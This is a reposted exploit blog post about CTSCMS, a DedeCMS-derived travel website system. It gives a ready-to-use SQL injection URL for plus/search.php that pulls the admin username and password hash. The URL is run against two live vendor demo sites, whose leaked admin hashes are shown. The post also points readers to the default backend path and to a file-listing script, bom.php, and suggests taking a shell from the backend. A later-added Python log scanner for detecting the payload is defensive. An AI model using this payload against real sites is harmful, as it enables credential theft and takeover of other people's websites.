Reposted from: http://www.0day5.com/?p=546
"China Tourism Service Website Management System (CTSCMS.COM) is a professional provider of travel website source code, travel website systems, travel website templates and travel website construction services, focused on the development of tourism e-commerce and serving travel agencies and the tourism industry..."
Well~ CTSCMS is really just DedeCMS (织梦) templates repackaged as their own commercial edition~ and some people actually shell out 500 yuan for it.
Check the update date:
data/admin/ver.txt
It is usually from 2010, so a direct getshell may still be possible.
exp:

http://www.0day5.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
The default backend path is
http://www.0day5.com/ctscms
If you can't find the backend, that's easy too: while reading the source I came across something interesting,
bom.php
<?php
//remove the utf-8 boms
//by magicbug at gmail dot com

// The start directory is taken straight from the query string (?dir=...) with no
// restriction at all, so any directory the web server can read can be walked.
if (isset($_GET['dir'])) { //config the basedir
    $basedir = $_GET['dir'];
} else {
    $basedir = '.';
}
// $auto = 1 means a BOM is not just reported but stripped by rewriting the file.
$auto = 1;
checkdir($basedir);

// Recursively walks $basedir and prints the name of every regular file found,
// followed by the result of the BOM check for that file.
function checkdir($basedir) {
    if ($dh = opendir($basedir)) {
        while (($file = readdir($dh)) !== false) {
            if ($file != '.' && $file != '..') {
                if (!is_dir($basedir . "/" . $file)) {
                    echo "filename: $basedir/$file ";
                    echo checkBOM("$basedir/$file") . " <br>";
                } else {
                    $dirname = $basedir . "/" . $file;
                    checkdir($dirname);
                }
            }
        }
        closedir($dh);
    }
}

// Reads the whole file and tests whether its first three bytes are the
// UTF-8 BOM (0xEF 0xBB 0xBF = 239 187 191).
function checkBOM($filename) {
    global $auto;
    $contents = file_get_contents($filename);
    $charset[1] = substr($contents, 0, 1);
    $charset[2] = substr($contents, 1, 1);
    $charset[3] = substr($contents, 2, 1);
    if (ord($charset[1]) == 239 && ord($charset[2]) == 187 && ord($charset[3]) == 191) {
        if ($auto == 1) {
            $rest = substr($contents, 3);
            rewrite($filename, $rest);
            return ("<font color=red>BOM found, automatically removed.</font>");
        } else {
            return ("<font color=red>BOM found.</font>");
        }
    } else {
        return ("BOM Not Found.");
    }
}

// Overwrites $filename with $data under an exclusive lock.
function rewrite($filename, $data) {
    $filenum = fopen($filename, "w");
    flock($filenum, LOCK_EX);
    fwrite($filenum, $data);
    fclose($filenum);
}
?>
It lists every file, heh~ and then you know the rest; when you can't find something, just check it live at
http://www.0day5.com/bom.php
Official demo:

http://c.ctscms.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a

Error infos: Duplicate entry '1|ctscms|d7f10e7cca0693eb8561' for key 'group_key'
http://s.ctscms.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a

Error infos: Duplicate entry '1|ctscms|c6364c485d55bb9df83a' for key 'group_key'
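From the detection side, the distinctive thing about the injection above is that the SQL rides in the *key* of the typeArr array, not in a value, so value-only input filters and most naive log greps miss it. The Python below (an added example, not from the original post or from CTSCMS) scans access-log lines for requests to plus/search.php whose typeArr key is anything other than a numeric id, which is all the legitimate search form ever submits; the log lines are constructed samples, and the path and token list are assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Combined-log request field: "GET /path?query HTTP/1.1" 200
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Fragments typical of the error-based (duplicate-entry) extraction shown in the post.
SQLI_TOKENS = ("information_schema", "floor(rand(", "group by", "select", "concat(")

def analyse_target(target):
    """Return findings for one request target ('/path?query'); [] means clean."""
    parts = urlsplit(target)
    if not parts.path.endswith("/plus/search.php"):
        return []
    findings = []
    # parse_qsl percent-decodes and splits each pair on its first literal '=', so an
    # encoded %3D inside the key stays in the key, exactly as PHP's $_GET sees it.
    for key, _value in parse_qsl(parts.query, keep_blank_values=True):
        if not key.startswith("typeArr["):
            continue
        index = key[len("typeArr["):]
        if index.endswith("]"):
            index = index[:-1]
        if index == "" or index.isdigit():
            continue  # typeArr[]=12 or typeArr[0]=12: what the search form sends
        lowered = index.lower()
        findings.append({"key": index[:60],
                         "tokens": [t for t in SQLI_TOKENS if t in lowered]})
    return findings

def scan_log(lines):
    """Return (line_number, status, findings) for each suspicious access-log line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        m = REQUEST_RE.search(line)
        if m is None:
            continue
        findings = analyse_target(m.group("target"))
        if findings:
            hits.append((number, int(m.group("status")), findings))
    return hits

# Constructed sample log lines (not from a real server): two benign searches and one
# request carrying the post's payload in its typeArr key (quotes/backticks encoded).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Mar/2013:10:01:02 +0800] "GET /plus/search.php?keyword=beijing&typeArr[0]=12 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [10/Mar/2013:10:01:09 +0800] "GET /plus/search.php?keyword=select&typeArr[]=3 HTTP/1.1" 200 5100',
    '198.51.100.7 - - [10/Mar/2013:10:02:30 +0800] "GET /plus/search.php?keyword=as&typeArr[111%3D@%60%5C%27%60)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+%60%23@__admin%60+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@%60%5C%27%60+]=a HTTP/1.1" 200 3200',
]
```

`scan_log(SAMPLE_LOG)` flags only the third line and lists all five tokens found in its key, while the `keyword=select` search on line two passes because only the array key is inspected.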
Getting a shell from the backend needs no explanation~